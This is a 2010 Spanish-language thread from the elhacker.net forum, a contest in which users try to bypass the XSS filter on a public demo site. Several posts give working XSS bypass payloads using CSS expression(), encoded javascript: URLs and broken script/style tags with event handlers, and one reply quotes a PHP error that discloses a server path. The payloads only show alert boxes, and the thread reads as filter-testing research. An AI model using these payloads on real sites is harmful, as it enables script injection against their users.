elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
28 Mayo 2012, 05:37  


Tema destacado: Últimos eventos sobre seguridad/inseguridad

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  [CYH] Bypass de filtros de XSS :)		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: [CYH] Bypass de filtros de XSS :)  (Leído 6,923 veces)
sirdarckcat
Troll Buena Onda y
Moderador
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
[CYH] Bypass de filtros de XSS :)
« en: 8 Abril 2010, 08:47 »
Can You Hack?
Semi-allowhtml

CYH es un evento donde todos los usuarios del foro pueden participar y ganar premios y realizar todo tipo de retos :D

Hola!

Los invito a h4x0r3ar este filtro de XSS:
http://allowhtml.com/demo/

Yo lo bypasee hace rato xD
Código:
<div style="xss=\000065xpression(confirm(1))!: url('xD');">hola</div>

Asi que no esta muy dificil!

Los 2 que encuentren mas bypasses antes del 8 de mayo, se ganan cuentas @elhacker.net

Saludos!!
« Última modificación: 13 Abril 2010, 01:39 por WHK » En línea


Leer reglas
- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
tragantras


Desconectado Desconectado

Mensajes: 466


Ver Perfil
Re: Bypass de filtros de XSS :)
« Respuesta #1 en: 8 Abril 2010, 13:50 »
alguien que sea generoso puede explicar la cadena que ha puesto sidarckcat

en concreto... el campo style de la etiqueta div

gracias y un saludo :3
En línea
Colaboraciones:
1 2
jdc


Desconectado Desconectado

Mensajes: 3.253


janito dos cuatro...


Ver Perfil WWW
Re: Bypass de filtros de XSS :)
« Respuesta #2 en: 8 Abril 2010, 17:38 »
Es parte de la celebración de abril negro?
 
No había puesto WHK el filtro de otra página?
En línea
sirdarckcat
Troll Buena Onda y
Moderador
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Bypass de filtros de XSS :)
« Respuesta #3 en: 8 Abril 2010, 22:11 »
el de WHK es PHPIDS
ese es otro


y no tiene nada que ver con abril negro xD
En línea


Leer reglas
- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
jdc


Desconectado Desconectado

Mensajes: 3.253


janito dos cuatro...


Ver Perfil WWW
Re: Bypass de filtros de XSS :)
« Respuesta #4 en: 8 Abril 2010, 22:15 »
ya no encontre nada y me dolio la cabeza, es muy extraño tu xss ¬¬ no lo entiendo o ya esta solucionado?

Código:
<img widht="2000" height="2000" src="http://foro.elhacker.net/Smileys/chef/carita.gif" alt="juas" />


jajajajaja
« Última modificación: 8 Abril 2010, 22:21 por janito24 » En línea
Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: Bypass de filtros de XSS :)
« Respuesta #5 en: 8 Abril 2010, 22:23 »
Raro, porque?, Creo que es CSS Injection :P, Además si mal no recuerdo, expression es solo para IE!  :silbar:

Código
<XSS STYLE="xss:expression(alert('XSS'))">...
« Última modificación: 8 Abril 2010, 22:27 por Alex@ShellRoot » En línea
---
yasión

Desconectado Desconectado

Mensajes: 48

‮‮


Ver Perfil WWW
Re: Bypass de filtros de XSS :)
« Respuesta #6 en: 8 Abril 2010, 23:07 »
Esto hace cosas raras:

Código
<a href="></a>

Es lo primero que he probado, luego lo miro un poco más.
En línea
SeC

Desconectado Desconectado

Mensajes: 109


I am mine.


Ver Perfil WWW
Re: Bypass de filtros de XSS :)
« Respuesta #7 en: 10 Abril 2010, 03:36 »
Ya he probado de mil maneras =/ , esto se ve lindo, pero nada jeje, ta bueno el filtro =P

Código
<a href="javascr&#38;#x0Aipt:a&#38;#x0Alert(1);" target="_blank">asd</a>
En línea
Educad a los niños y no sera necesario castigar a los hombres - Pitagoras.
Ansi-coder
Undersecurity
cgvwzq

Desconectado Desconectado

Mensajes: 57


Agente P.


Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #8 en: 14 Abril 2010, 20:36 »
Quiero una cuenta... =P

Código:
<script>><img src=x onerror=alert(/cuack/) tr=
En línea
Some stuff:

  • www.a] parsed as ]www.a]
  • Bypass elhacker's img filter with ALT attribute!
  • ¿Para cuándo SQLi I y II? WZ
Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #9 en: 14 Abril 2010, 20:41 »
jejejejeje  ;-)
En línea
---
SeC

Desconectado Desconectado

Mensajes: 109


I am mine.


Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #10 en: 15 Abril 2010, 00:08 »
Parece que aún vale, asique :P

Código:
<STYLE TYPE="text/javascript">><a href="http://elhacker.net" onclick="alert(1)">XSS</a><</STYLE>

otro,

Código:
<script>><a href="http://elhacker.net" onclick="alert(1)">XSS</a><
« Última modificación: 15 Abril 2010, 14:06 por SeC » En línea
Educad a los niños y no sera necesario castigar a los hombres - Pitagoras.
Ansi-coder
Undersecurity
~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 954



Ver Perfil
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #11 en: 15 Abril 2010, 01:56 »
Código:
<Script>><p onMouseDown=alert(0) >aa </p> t=
<script language="javascript">><p onMouseDown=alert(0) >aa </p> t=
<Style>><p onMouseOut=alert(0) >aa </p> t=
« Última modificación: 16 Abril 2010, 00:05 por ~ Yoya ~ » En línea
WHK
吴阿卡
Moderador
***
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #12 en: 15 Abril 2010, 06:03 »
jajaja que chafa el filtro
En línea
Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
jdc


Desconectado Desconectado

Mensajes: 3.253


janito dos cuatro...


Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #13 en: 15 Abril 2010, 06:20 »
File disclosoure no vale?

Citar
Warning: file_get_contents(/home/simoneme/allowhtml/main/files/antisamy.xml) [function.file-get-contents]: failed to open stream: No such file or directory in /home/simoneme/allowhtml/main/include/controllers/source_antisamy.php on line 7
En línea
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.187



Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #14 en: 15 Abril 2010, 15:02 »
Phat disculosure :P
En línea


Creiste que mi firma había muerto? NO! Volvió, y en forma de fichas!

link al último código de la firma
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Bypass + iSQL
Nivel Web 		Shell Root 5 1,161 Último mensaje 1 Junio 2011, 21:01
por .mokk.
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines